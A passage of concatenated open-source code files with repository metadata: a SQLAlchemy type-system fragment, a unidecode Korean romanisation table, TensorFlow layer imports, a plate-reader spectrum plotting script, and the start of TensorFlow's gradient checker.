t.drop(bind=bind, checkfirst=checkfirst)
def _on_table_create(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_table_create(target, bind, **kw)
def _on_table_drop(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_table_drop(target, bind, **kw)
def _on_metadata_create(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_metadata_create(target, bind, **kw)
def _on_metadata_drop(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_metadata_drop(target, bind, **kw)
class Enum(String, SchemaType):
"""Generic Enum Type.
The Enum type provides a set of possible string values which the
column is constrained towards.
By default, uses the backend's native ENUM type if available,
else uses VARCHAR + a CHECK constraint.
.. seealso::
:class:`~.postgresql.ENUM` - PostgreSQL-specific type,
which has additional functionality.
"""
__visit_name__ = 'enum'
def __init__(self, *enums, **kw):
"""Construct an enum.
Keyword arguments which don't apply to a specific backend are ignored
by that backend.
:param \*enums: string or unicode enumeration labels. If unicode
labels are present, the `convert_unicode` flag is auto-enabled.
:param convert_unicode: Enable unicode-aware bind parameter and
result-set processing for this Enum's data. This is set
automatically based on the presence of unicode label strings.
:param metadata: Associate this type directly with a ``MetaData``
object. For types that exist on the target database as an
independent schema construct (Postgresql), this type will be
created and dropped within ``create_all()`` and ``drop_all()``
operations. If the type is not associated with any ``MetaData``
object, it will associate itself with each ``Table`` in which it is
used, and will be created when any of those individual tables are
created, after a check is performed for it's existence. The type is
only dropped when ``drop_all()`` is called for that ``Table``
object's metadata, however.
:param name: The name of this type. This is required for Postgresql
and any future supported database which requires an explicitly
named type, or an explicitly named constraint in order to generate
the type and/or a table that uses it.
:param native_enum: Use the database's native ENUM type when
available. Defaults to True. When False, uses VARCHAR + check
constraint for all backends.
:param schema: Schema name of this type. For types that exist on the
target database as an independent schema construct (Postgresql),
this parameter specifies the named schema in which the type is
present.
.. note::
The ``schema`` of the :class:`.Enum` type does not
by default make use of the ``schema`` established on the
owning :class:`.Table`. If this behavior is desired,
set the ``inherit_schema`` flag to ``True``.
:param quote: Set explicit quoting preferences for the type's name.
:param inherit_schema: When ``True``, the "schema" from the owning
:class:`.Table` will be copied to the "schema" attribute of this
:class:`.Enum`, replacing whatever value was passed for the
``schema`` attribute. This also takes effect when using the
:meth:`.Table.tometadata` operation.
.. versionadded:: 0.8
"""
self.enums = enums
self.native_enum = kw.pop('native_enum', True)
convert_unicode = kw.pop('convert_unicode', None)
if convert_unicode is None:
for e in enums:
if isinstance(e, util.text_type):
convert_unicode = True
break
else:
convert_unicode = False
if self.enums:
length = max(len(x) for x in self.enums)
else:
length = 0
String.__init__(self,
length=length,
convert_unicode=convert_unicode,
)
SchemaType.__init__(self, **kw)
def __repr__(self):
return util.generic_repr(self, [
("native_enum", True),
("name", None)
])
def _should_create_constraint(self, compiler):
return not self.native_enum or \
not compiler.dialect.supports_native_enum
@util.dependencies("sqlalchemy.sql.schema")
def _set_table(self, schema, column, table):
if self.native_enum:
SchemaType._set_table(self, column, table)
e = schema.CheckConstraint(
column.in_(self.enums),
name=self.name,
_create_rule=util.portable_instancemethod(
self._should_create_constraint)
)
table.append_constraint(e)
def adapt(self, impltype, **kw):
schema = kw.pop('schema', self.schema)
metadata = kw.pop('metadata', self.metadata)
if issubclass(impltype, Enum):
return impltype(name=self.name,
schema=schema,
metadata=metadata,
convert_unicode=self.convert_unicode,
native_enum=self.native_enum,
inherit_schema=self.inherit_schema,
*self.enums,
**kw
)
else:
return super(Enum, self).adapt(impltype, **kw)
class PickleType(TypeDecorator):
"""Holds Python objects, which are serialized using pickle.
PickleType builds upon the Binary type to apply Python's
``pickle.dumps()`` to incoming objects, and ``pickle.loads()`` on
the way out, allowing any pickleable Python object to be stored as
a serialized binary field.
To allow ORM change events to propagate for elements associated
with :class:`.PickleType`, see :ref:`mutable_toplevel`.
"""
impl = LargeBinary
def __init__(self, protocol=pickle.HIGHEST_PROTOCOL,
pickler=None, comparator=None):
"""
Construct a PickleType.
:param protocol: defaults to ``pickle.HIGHEST_PROTOCOL``.
:param pickler: defaults to cPickle.pickle or pickle.pickle if
cPickle is not available. May be any object with
pickle-compatible ``dumps` and ``loads`` methods.
:param comparator: a 2-arg callable predicate used
to compare values of this type. If left as ``None``,
the Python "equals" operator is used to compare values.
"""
self.protocol = protocol
self.pickler = pickler or pickle
self.comparator = comparator
super(PickleType, self).__init__()
def __reduce__(self):
return PickleType, (self.protocol,
None,
self.comparator)
def bind_processor(self, dialect):
impl_processor = self.impl.bind_processor(dialect)
dumps = self.pickler.dumps
protocol = self.protocol
if impl_processor:
def process(value):
if value is not None:
value = dumps(value, protocol)
return impl_processor(value)
else:
def process(value):
if value is not None:
value = dumps(value, protocol)
return value
return process
def result_processor(self, dialect, coltype):
impl_processor = self.impl.result_processor(dialect, coltype)
loads = self.pickler.loads
if impl_processor:
def process(value):
value = impl_processor(value)
if value is None:
return None
return loads(value)
else:
def process(value):
if value is None:
return None
return loads(value)
return process
def compare_values(self, x, y):
if self.comparator:
return self.comparator(x, y)
else:
return x == y
class Boolean(TypeEngine, SchemaType):
"""A bool datatype.
Boolean typically uses BOOLEAN or SMALLINT on the DDL side, and on
the Python side deals in ``True`` or ``False``.
"""
__visit_name__ = 'boolean'
def __init__(self, create_constraint=True, name=None):
"""Construct a Boolean.
:param create_constraint: defaults to True. If the boolean
is generated as an int/smallint, also create a CHECK constraint
on the table that ensures 1 or 0 as a value.
:param name: if a CHECK constraint is generated, specify
the name of the constraint.
"""
self.create_constraint = create_constraint
self.name = name
def _should_create_constraint(self, compiler):
return not compiler.dialect.supports_native_boolean
@util.dependencies("sqlalchemy.sql.schema")
def _set_table(self, schema, column, table):
if not self.create_constraint:
return
e = schema.CheckConstraint(
column.in_([0, 1]),
name=self.name,
_create_rule=util.portable_instancemethod(
self._should_create_constraint)
)
table.append_constraint(e)
@property
def python_type(self):
return bool
def bind_processor(self, dialect):
if dialect.supports_native_boolean:
return None
else:
return processors.boolean_to_int
def result_processor(self, dialect, coltype):
if dialect.supports_native_boolean:
return None
else:
return processors.int_to_boolean
class Interval(_DateAffinity, TypeDecorator):
"""A type for ``datetime.timedelta()`` objects.
The Interval type deals with ``datetime.timedelta`` objects. In
PostgreSQL, the native ``INTERVAL`` type is used; for others, the
value is stored as a date which is relative to the "epoch"
(Jan. 1, 1970).
Note that the ``Interval`` type does not currently provide date arithmetic
operations on platforms which do not support interval types natively. Such
operations usually require transformation of both sides of the expression
(such as, conversion of both sides into integer epoch values first) which
currently is a manual procedure (such as via
:attr:`~sqlalchemy.sql.expression.func`).
"""
impl = DateTime
epoch = dt.datetime.utcfromtimestamp(0)
def __init__(self, native=True,
second_precision=None,
day_precision=None):
"""Construct an Interval object.
:param native: when True, use the actual
INTERVAL type provided by the database, if
supported (currently Postgresql, Oracle).
Otherwise, represent the interval data as
an epoch value regardless.
:param second_precision: For native interval types
which support a "fractional seconds precision" parameter,
i.e. Oracle and Postgresql
:param day_precision: for native interval types which
support a "day precision" parameter, i.e. Oracle.
"""
super(Interval, self).__init__()
self.native = native
self.second_precision = second_precision
self.day_precision = day_precision
def adapt(self, cls, **kw):
if self.native and hasattr(cls, '_adapt_from_generic_interval'):
return cls._adapt_from_generic_interval(self, **kw)
else:
return self.__class__(
native=self.native,
second_precision=self.second_precision,
day_precision=self.day_precision,
**kw)
@property
def python_type(self):
return dt.timedelta
def bind_processor(self, dialect):
impl_processor = self.impl.bind_processor(dialect)
epoch = self.epoch
if impl_processor:
def process(value):
if value is not None:
value = epoch + value
return impl_processor(value)
else:
def process(value):
if value is not None:
value = epoch + value
return value
return process
def result_processor(self, dialect, coltype):
impl_processor = self.impl.result_processor(dialect, coltype)
epoch = self.epoch
if impl_processor:
def process(value):
value = impl_processor(value)
if value is None:
return None
return value - epoch
else:
def process(value):
if value is None:
return None
return value - epoch
return process
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Date: DateTime,
Interval: self.__class__,
DateTime: DateTime,
Time: Time,
},
operators.sub: {
Interval: self.__class__
},
operators.mul: {
Numeric: self.__class__
},
operators.truediv: {
Numeric: self.__class__
},
operators.div: {
Numeric: self.__class__
}
}
@property
def _type_affinity(self):
return Interval
def coerce_compared_value(self, op, value):
"""See :meth:`.TypeEngine.coerce_compared_value` for a description."""
return self.impl.coerce_compared_value(op, value)
class REAL(Float):
"""The SQL REAL type."""
__visit_name__ = 'REAL'
class FLOAT(Float):
"""The SQL FLOAT type."""
__visit_name__ = 'FLOAT'
class NUMERIC(Numeric):
"""The SQL NUMERIC type."""
__visit_name__ = 'NUMERIC'
class DECIMAL(Numeric):
"""The SQL DECIMAL type."""
__visit_name__ = 'DECIMAL'
class INTEGER(Integer):
"""The SQL INT or INTEGER type."""
__visit_name__ = 'INTEGER'
INT = INTEGER
class SMALLINT(SmallInteger):
"""The SQL SMALLINT type."""
__visit_name__ = 'SMALLINT'
class BIGINT(BigInteger):
"""The SQL BIGINT type."""
__visit_name__ = 'BIGINT'
class TIMESTAMP(DateTime):
"""The SQL TIMESTAMP type."""
__visit_name__ = 'TIMESTAMP'
def get_dbapi_type(self, dbapi):
return dbapi.TIMESTAMP
class DATETIME(DateTime):
"""The SQL DATETIME type."""
__visit_name__ = 'DATETIME'
class DATE(Date):
"""The SQL DATE type."""
__visit_name__ = 'DATE'
class TIME(Time):
"""The SQL TIME type."""
__visit_name__ = 'TIME'
class TEXT(Text):
"""The SQL TEXT type."""
__visit_name__ = 'TEXT'
class CLOB(Text):
"""The CLOB type.
This type is found in Oracle and Informix.
"""
__visit_name__ = 'CLOB'
class VARCHAR(String):
"""The SQL VARCHAR type."""
__visit_name__ = 'VARCHAR'
class NVARCHAR(Unicode):
"""The SQL NVARCHAR type."""
__visit_name__ = 'NVARCHAR'
class CHAR(String):
"""The SQL CHAR type."""
__visit_name__ = 'CHAR'
class NCHAR(Unicode):
"""The SQL NCHAR type."""
__visit_name__ = 'NCHAR'
class BLOB(LargeBinary):
"""The SQL BLOB type."""
__visit_name__ = 'BLOB'
class BINARY(_Binary):
"""The SQL BINARY type."""
__visit_name__ = 'BINARY'
class VARBINARY(_Binary):
"""The SQL VARBINARY type."""
__visit_name__ = 'VARBINARY'
class BOOLEAN(Boolean):
"""The SQL BOOLEAN type."""
__visit_name__ = 'BOOLEAN'
class NullType(TypeEngine):
"""An unknown type.
:class:`.NullType` is used as a default type for those cases where
a type cannot be determined, including:
* During table reflection, when the type of a column is not recognized
by the :class:`.Dialect`
* When constructing SQL expressions using plain Python objects of
unknown types (e.g. ``somecolumn == my_special_object``)
* When a new :class:`.Column` is created, and the given type is passed
as ``None`` or is not passed at all.
The :class:`.NullType` can be used within SQL expression invocation
without issue, it just has no behavior either at the expression construction
level or at the bind-parameter/result processing level. :class:`.NullType`
will result in a :class:`.CompileException` if the compiler is asked to render
the type itself, such as if it is used in a :func:`.cast` operation
or within a schema creation operation such as that invoked by
:meth:`.MetaData.create_all` or the :class:`.CreateTable` construct.
"""
__visit_name__ = 'null'
_isnull = True
class Comparator(TypeEngine.Comparator):
def _adapt_expression(self, op, other_comparator):
if isinstance(other_comparator, NullType.Comparator) or \
not operators.is_commutative(op):
return op, self.expr.type
else:
return other_comparator._adapt_expression(op, self)
comparator_factory = Comparator
NULLTYPE = NullType()
BOOLEANTYPE = Boolean()
STRINGTYPE = String()
INTEGERTYPE = Integer()
_type_map = {
int: Integer(),
float: Numeric(),
bool: BOOLEANTYPE,
decimal.Decimal: Numeric(),
dt.date: Date(),
dt.datetime: DateTime(),
dt.time: Time(),
dt.timedelta: Interval(),
util.NoneType: NULLTYPE
}
if util.py3k:
_type_map[bytes] = LargeBinary()
_type_map[str] = Unicode()
else:
_type_map[unicode] = Unicode()
_type_map[str] = String()
# back-assign to type_api
from . import type_api
type_api.BOOLEANTYPE = BOOLEANTYPE
type_api.STRINGTYPE = STRINGTYPE
type_api.INTEGERTYPE = INTEGERTYPE
type_api.NULLTYPE = NULLTYPE
type_api._type_map = _type_map
# this one, there's all kinds of ways to play it, but at the EOD
# there's just a giant dependency cycle between the typing system and
# the expression element system, as you might expect. We can use
# importlaters or whatnot, but the typing system just necessarily has
# to have some kind of connection like this. right now we're injecting the
# _DefaultColumnComparator implementation into the TypeEngine.Comparator interface.
# Alternatively TypeEngine.Comparator could have an "impl" injected, though
# just injecting the base is simpler, error free, and more performant.
class Comparator(_DefaultColumnComparator):
BOOLEANTYPE = BOOLEANTYPE
TypeEngine.Comparator.__bases__ = (Comparator, ) + TypeEngine.Comparator.__bases__
| mit |
menardorama/ReadyNAS-Add-ons | headphones-1.0.0/files/etc/apps/headphones/lib/unidecode/x0c5.py | 253 | 4581 | data = (
'sseum', # 0x00
'sseub', # 0x01
'sseubs', # 0x02
'sseus', # 0x03
'sseuss', # 0x04
'sseung', # 0x05
'sseuj', # 0x06
'sseuc', # 0x07
'sseuk', # 0x08
'sseut', # 0x09
'sseup', # 0x0a
'sseuh', # 0x0b
'ssyi', # 0x0c
'ssyig', # 0x0d
'ssyigg', # 0x0e
'ssyigs', # 0x0f
'ssyin', # 0x10
'ssyinj', # 0x11
'ssyinh', # 0x12
'ssyid', # 0x13
'ssyil', # 0x14
'ssyilg', # 0x15
'ssyilm', # 0x16
'ssyilb', # 0x17
'ssyils', # 0x18
'ssyilt', # 0x19
'ssyilp', # 0x1a
'ssyilh', # 0x1b
'ssyim', # 0x1c
'ssyib', # 0x1d
'ssyibs', # 0x1e
'ssyis', # 0x1f
'ssyiss', # 0x20
'ssying', # 0x21
'ssyij', # 0x22
'ssyic', # 0x23
'ssyik', # 0x24
'ssyit', # 0x25
'ssyip', # 0x26
'ssyih', # 0x27
'ssi', # 0x28
'ssig', # 0x29
'ssigg', # 0x2a
'ssigs', # 0x2b
'ssin', # 0x2c
'ssinj', # 0x2d
'ssinh', # 0x2e
'ssid', # 0x2f
'ssil', # 0x30
'ssilg', # 0x31
'ssilm', # 0x32
'ssilb', # 0x33
'ssils', # 0x34
'ssilt', # 0x35
'ssilp', # 0x36
'ssilh', # 0x37
'ssim', # 0x38
'ssib', # 0x39
'ssibs', # 0x3a
'ssis', # 0x3b
'ssiss', # 0x3c
'ssing', # 0x3d
'ssij', # 0x3e
'ssic', # 0x3f
'ssik', # 0x40
'ssit', # 0x41
'ssip', # 0x42
'ssih', # 0x43
'a', # 0x44
'ag', # 0x45
'agg', # 0x46
'ags', # 0x47
'an', # 0x48
'anj', # 0x49
'anh', # 0x4a
'ad', # 0x4b
'al', # 0x4c
'alg', # 0x4d
'alm', # 0x4e
'alb', # 0x4f
'als', # 0x50
'alt', # 0x51
'alp', # 0x52
'alh', # 0x53
'am', # 0x54
'ab', # 0x55
'abs', # 0x56
'as', # 0x57
'ass', # 0x58
'ang', # 0x59
'aj', # 0x5a
'ac', # 0x5b
'ak', # 0x5c
'at', # 0x5d
'ap', # 0x5e
'ah', # 0x5f
'ae', # 0x60
'aeg', # 0x61
'aegg', # 0x62
'aegs', # 0x63
'aen', # 0x64
'aenj', # 0x65
'aenh', # 0x66
'aed', # 0x67
'ael', # 0x68
'aelg', # 0x69
'aelm', # 0x6a
'aelb', # 0x6b
'aels', # 0x6c
'aelt', # 0x6d
'aelp', # 0x6e
'aelh', # 0x6f
'aem', # 0x70
'aeb', # 0x71
'aebs', # 0x72
'aes', # 0x73
'aess', # 0x74
'aeng', # 0x75
'aej', # 0x76
'aec', # 0x77
'aek', # 0x78
'aet', # 0x79
'aep', # 0x7a
'aeh', # 0x7b
'ya', # 0x7c
'yag', # 0x7d
'yagg', # 0x7e
'yags', # 0x7f
'yan', # 0x80
'yanj', # 0x81
'yanh', # 0x82
'yad', # 0x83
'yal', # 0x84
'yalg', # 0x85
'yalm', # 0x86
'yalb', # 0x87
'yals', # 0x88
'yalt', # 0x89
'yalp', # 0x8a
'yalh', # 0x8b
'yam', # 0x8c
'yab', # 0x8d
'yabs', # 0x8e
'yas', # 0x8f
'yass', # 0x90
'yang', # 0x91
'yaj', # 0x92
'yac', # 0x93
'yak', # 0x94
'yat', # 0x95
'yap', # 0x96
'yah', # 0x97
'yae', # 0x98
'yaeg', # 0x99
'yaegg', # 0x9a
'yaegs', # 0x9b
'yaen', # 0x9c
'yaenj', # 0x9d
'yaenh', # 0x9e
'yaed', # 0x9f
'yael', # 0xa0
'yaelg', # 0xa1
'yaelm', # 0xa2
'yaelb', # 0xa3
'yaels', # 0xa4
'yaelt', # 0xa5
'yaelp', # 0xa6
'yaelh', # 0xa7
'yaem', # 0xa8
'yaeb', # 0xa9
'yaebs', # 0xaa
'yaes', # 0xab
'yaess', # 0xac
'yaeng', # 0xad
'yaej', # 0xae
'yaec', # 0xaf
'yaek', # 0xb0
'yaet', # 0xb1
'yaep', # 0xb2
'yaeh', # 0xb3
'eo', # 0xb4
'eog', # 0xb5
'eogg', # 0xb6
'eogs', # 0xb7
'eon', # 0xb8
'eonj', # 0xb9
'eonh', # 0xba
'eod', # 0xbb
'eol', # 0xbc
'eolg', # 0xbd
'eolm', # 0xbe
'eolb', # 0xbf
'eols', # 0xc0
'eolt', # 0xc1
'eolp', # 0xc2
'eolh', # 0xc3
'eom', # 0xc4
'eob', # 0xc5
'eobs', # 0xc6
'eos', # 0xc7
'eoss', # 0xc8
'eong', # 0xc9
'eoj', # 0xca
'eoc', # 0xcb
'eok', # 0xcc
'eot', # 0xcd
'eop', # 0xce
'eoh', # 0xcf
'e', # 0xd0
'eg', # 0xd1
'egg', # 0xd2
'egs', # 0xd3
'en', # 0xd4
'enj', # 0xd5
'enh', # 0xd6
'ed', # 0xd7
'el', # 0xd8
'elg', # 0xd9
'elm', # 0xda
'elb', # 0xdb
'els', # 0xdc
'elt', # 0xdd
'elp', # 0xde
'elh', # 0xdf
'em', # 0xe0
'eb', # 0xe1
'ebs', # 0xe2
'es', # 0xe3
'ess', # 0xe4
'eng', # 0xe5
'ej', # 0xe6
'ec', # 0xe7
'ek', # 0xe8
'et', # 0xe9
'ep', # 0xea
'eh', # 0xeb
'yeo', # 0xec
'yeog', # 0xed
'yeogg', # 0xee
'yeogs', # 0xef
'yeon', # 0xf0
'yeonj', # 0xf1
'yeonh', # 0xf2
'yeod', # 0xf3
'yeol', # 0xf4
'yeolg', # 0xf5
'yeolm', # 0xf6
'yeolb', # 0xf7
'yeols', # 0xf8
'yeolt', # 0xf9
'yeolp', # 0xfa
'yeolh', # 0xfb
'yeom', # 0xfc
'yeob', # 0xfd
'yeobs', # 0xfe
'yeos', # 0xff
)
| gpl-2.0 |
JVillella/tensorflow | tensorflow/python/layers/layers.py | 41 | 2376 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=line-too-long
"""This library provides a set of high-level neural networks layers.
@@dense
@@dropout
@@conv1d
@@conv2d
@@conv3d
@@separable_conv2d
@@conv2d_transpose
@@conv3d_transpose
@@average_pooling1d
@@max_pooling1d
@@average_pooling2d
@@max_pooling2d
@@average_pooling3d
@@max_pooling3d
@@batch_normalization
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util.all_util import remove_undocumented
# pylint: disable=g-bad-import-order,unused-import
# Core layers.
from tensorflow.python.layers.core import dense
from tensorflow.python.layers.core import dropout
# Convolutional layers.
from tensorflow.python.layers.convolutional import conv1d
from tensorflow.python.layers.convolutional import conv2d
from tensorflow.python.layers.convolutional import conv3d
from tensorflow.python.layers.convolutional import separable_conv2d
from tensorflow.python.layers.convolutional import conv2d_transpose
from tensorflow.python.layers.convolutional import conv3d_transpose
# Pooling layers.
from tensorflow.python.layers.pooling import average_pooling1d
from tensorflow.python.layers.pooling import max_pooling1d
from tensorflow.python.layers.pooling import average_pooling2d
from tensorflow.python.layers.pooling import max_pooling2d
from tensorflow.python.layers.pooling import average_pooling3d
from tensorflow.python.layers.pooling import max_pooling3d
# Normalization layers.
from tensorflow.python.layers.normalization import batch_normalization
# pylint: enable=g-bad-import-order,unused-import
_allowed_symbols = []
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 |
sonyahanson/assaytools | examples/ipynbs/data-analysis/spectra/2015-12-18/xml2png4scans-spectra.py | 8 | 5636 | # This script takes xml data file output from the Tecan Infinite m1000 Pro plate reader
# and makes quick and dirty images of the raw data.
# But with scans and not just singlet reads.
# This script specifically combines four spectrum scripts (AB, CD, EF, GH) into a single dataframe and plot.
# The same procedure can be used to make matrices suitable for analysis using
# matrix = dataframe.values
# Made by Sonya Hanson, with some help from things that worked in xml2png.py and xml2png4scans.py
# Friday, November 18,2015
# Usage: python xml2png4scans-spectra.py *.xml
############ For future to combine with xml2png.py
#
# for i, sect in enumerate(Sections):
# reads = sect.xpath("*/Well")
# parameters = root.xpath(path)[0]
# if reads[0].attrib['Type'] == "Scan":
#
##############
import matplotlib.pyplot as plt
from lxml import etree
import pandas as pd
import matplotlib.cm as cm
import seaborn
import sys
import os
### Define xml files.
xml_files = sys.argv[1:]
so_many = len(xml_files)
print "****This script is about to make png files for %s xml files. ****" % so_many
### Define extract function that extracts parameters
def extract(taglist):
result = []
for p in taglist:
print "Attempting to extract tag '%s'..." % p
try:
param = parameters.xpath("*[@Name='" + p + "']")[0]
result.append( p + '=' + param.attrib['Value'])
except:
### tag not found
result.append(None)
return result
### Define an initial set of dataframes, one per each section
large_dataframe0 = pd.DataFrame()
large_dataframe1 = pd.DataFrame()
large_dataframe2 = pd.DataFrame()
for file in xml_files:
### Parse XML file.
root = etree.parse(file)
### Remove extension from xml filename.
file_name = os.path.splitext(file)[0]
### Extract plate type and barcode.
plate = root.xpath("/*/Header/Parameters/Parameter[@Name='Plate']")[0]
plate_type = plate.attrib['Value']
try:
bar = root.xpath("/*/Plate/BC")[0]
barcode = bar.text
except:
barcode = 'no barcode'
### Define Sections.
Sections = root.xpath("/*/Section")
much = len(Sections)
print "****The xml file " + file + " has %s data sections:****" % much
for sect in Sections:
print sect.attrib['Name']
for i, sect in enumerate(Sections):
### Extract Parameters for this section.
path = "/*/Section[@Name='" + sect.attrib['Name'] + "']/Parameters"
parameters = root.xpath(path)[0]
### Parameters are extracted slightly differently depending on Absorbance or Fluorescence read.
# Attach these to title1, title2, or title3, depending on section which will be the same for all 4 files.
if parameters[0].attrib['Value'] == "Absorbance":
result = extract(["Mode", "Wavelength Start", "Wavelength End", "Wavelength Step Size"])
globals()["title"+str(i)] = '%s, %s, %s, %s' % tuple(result)
else:
result = extract(["Gain", "Excitation Wavelength", "Emission Wavelength", "Part of Plate", "Mode"])
globals()["title"+str(i)] = '%s, %s, %s, \n %s, %s' % tuple(result)
print "****The %sth section has the parameters:****" %i
print globals()["title"+str(i)]
### Extract Reads for this section.
Sections = root.xpath("/*/Section")
reads = root.xpath("/*/Section[@Name='" + sect.attrib['Name'] + "']/*/Well")
wellIDs = [read.attrib['Pos'] for read in reads]
data = [(s.text, float(s.attrib['WL']), r.attrib['Pos'])
for r in reads
for s in r]
dataframe = pd.DataFrame(data, columns=['fluorescence','wavelength (nm)','Well'])
### dataframe_rep replaces 'OVER' (when fluorescence signal maxes out) with '3289277', an arbitrarily high number
dataframe_rep = dataframe.replace({'OVER':'3289277'})
dataframe_rep[['fluorescence']] = dataframe_rep[['fluorescence']].astype('float')
### Create large_dataframe1, large_dataframe2, and large_dataframe3 that collect data for each section
### as we run through cycle through sections and files.
globals()["dataframe_pivot"+str(i)] = pd.pivot_table(dataframe_rep, index = 'wavelength (nm)', columns= ['Well'])
print 'The max fluorescence value in this dataframe is %s'% globals()["dataframe_pivot"+str(i)].values.max()
globals()["large_dataframe"+str(i)] = pd.concat([globals()["large_dataframe"+str(i)],globals()["dataframe_pivot"+str(i)]])
### Plot, making a separate png for each section.
for i, sect in enumerate(Sections):
section_name = sect.attrib['Name']
path = "/*/Section[@Name='" + sect.attrib['Name'] + "']/Parameters"
parameters = root.xpath(path)[0]
if parameters[0].attrib['Value'] == "Absorbance":
section_ylim = [0,0.2]
else:
section_ylim = [0,40000]
Alphabet = ['A','B','C','D','E','F','G','H']
fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(12, 12))
for j,A in enumerate(Alphabet):
for k in range(1,12):
try:
globals()["large_dataframe"+str(i)].fluorescence.get(A + str(k)).plot(ax=axes[(j/3)%3,j%3], title=A, c=cm.hsv(k*15), ylim=section_ylim, xlim=[240,800])
except:
print "****No row %s.****" %A
fig.suptitle('%s \n %s \n Barcode = %s' % (globals()["title"+str(i)], plate_type, barcode), fontsize=14)
fig.subplots_adjust(hspace=0.3)
plt.savefig('%s_%s.png' % (file_name, section_name))
| lgpl-2.1 |
MycChiu/tensorflow | tensorflow/python/ops/gradient_checker.py | 82 | 14406 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradient checker for any ops, graphs.
The gradient checker verifies numerically that an op/graph properly
computes the gradients
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients
from tensorflow.python.platform import tf_logging as logging
def _product(t):
if isinstance(t, int):
return t
else:
y = 1
for x in t:
y *= x
return y
def _extra_feeds(extra_feed_dict, new_feeds):
if not extra_feed_dict:
return new_feeds
r = {}
r.update(extra_feed_dict)
r.update(new_feeds)
return r
def _compute_theoretical_jacobian(x, x_shape, x_data, dy, dy_shape, dx,
extra_feed_dict):
"""Computes the theoretical Jacobian for dy/dx.
Computes the theoretical Jacobian using the ops generated by
compute_gradient().
Args:
x: the tensor "x".
x_shape: the dimensions of x as a tuple or an array of ints.
x_data: a numpy parray as the input data for x
dy: the tensor "dy".
dy_shape: the dimensions of dy as a tuple or an array of ints.
dx: Tensor or IndexedSlices representing dx
extra_feed_dict: dict that allows fixing specified tensor values
during the jacobian calculation.
Returns:
A 2-d numpy array representing the Jacobian for dy/dx. It has "x_size" rows
and "dy_size" columns where "x_size" is the number of elements in x and
"dy_size" is the number of elements in dy.
Raises:
ValueError: If `dy` is empty but the gradient is nonzero.
"""
# Complex vectors are treated as vectors of twice as many reals.
if x.dtype.is_complex:
x_shape = tuple(x_shape) + (2,)
dy_factor = 2 if dy.dtype.is_complex else 1
# To compute the jacobian, we treat x and y as one-dimensional vectors.
x_size = _product(x_shape)
x_val_size = _product(x_shape[1:]) # This is used for sparse gradients
dy_size = _product(dy_shape) * dy_factor
# Allocate 2-D Jacobian, with x dimensions smashed into the first
# dimension and y dimensions smashed into the second.
jacobian = np.zeros((x_size, dy_size),
dtype=x.dtype.real_dtype.as_numpy_dtype)
# For each of the entry of dy, we set this to be 1 and
# everything else to be 0 and compute the backprop -- this will give us one
# one column of the Jacobian matrix.
dy_data = np.zeros(dy_shape, dtype=dy.dtype.as_numpy_dtype)
dy_data_flat = dy_data.ravel().view(dy.dtype.real_dtype.as_numpy_dtype)
sess = ops.get_default_session()
for col in range(dy_size):
dy_data_flat[col] = 1
if isinstance(dx, ops.IndexedSlices):
backprop_indices, backprop_values = sess.run(
[dx.indices, dx.values],
feed_dict=_extra_feeds(extra_feed_dict, {x: x_data, dy: dy_data}))
for i, v in zip(backprop_indices, backprop_values):
r_begin = i * x_val_size
r_end = r_begin + x_val_size
jacobian[r_begin:r_end, col] += v.flat
else:
assert isinstance(dx, ops.Tensor), "dx = " + str(dx)
backprop = sess.run(
dx, feed_dict=_extra_feeds(extra_feed_dict, {x: x_data, dy: dy_data}))
jacobian[:, col] = backprop.ravel().view(jacobian.dtype)
dy_data_flat[col] = 0
# If the output is empty, run the gradients at least once and make sure
# they produce zeros.
if not dy_size:
backprop = sess.run(
dx, feed_dict=_extra_feeds(extra_feed_dict, {x: x_data, dy: dy_data}))
if backprop.shape != x_data.shape:
raise ValueError("Empty gradient has wrong shape: expected %s, got %s" %
(x_data.shape, backprop.shape))
if np.any(backprop):
raise ValueError("Empty tensor with nonzero gradients")
logging.vlog(1, "Theoretical Jacobian =\n%s", jacobian)
return jacobian
def _compute_numeric_jacobian(x, x_shape, x_data, y, y_shape, delta,
extra_feed_dict):
"""Computes the numeric Jacobian for dy/dx.
Computes the numeric Jacobian by slightly perturbing the inputs and
measuring the differences on the output.
Args:
x: the tensor "x".
x_shape: the dimensions of x as a tuple or an array of ints.
x_data: a numpy array as the input data for x
y: the tensor "y".
y_shape: the dimensions of y as a tuple or an array of ints.
delta: the amount of perturbation we give to the input
extra_feed_dict: dict that allows fixing specified tensor values
during the jacobian calculation.
Returns:
A 2-d numpy array representing the Jacobian for dy/dx. It has "x_size" rows
and "y_size" columns where "x_size" is the number of elements in x and
"y_size" is the number of elements in y.
"""
# To compute the jacobian, we treat x and y as one-dimensional vectors
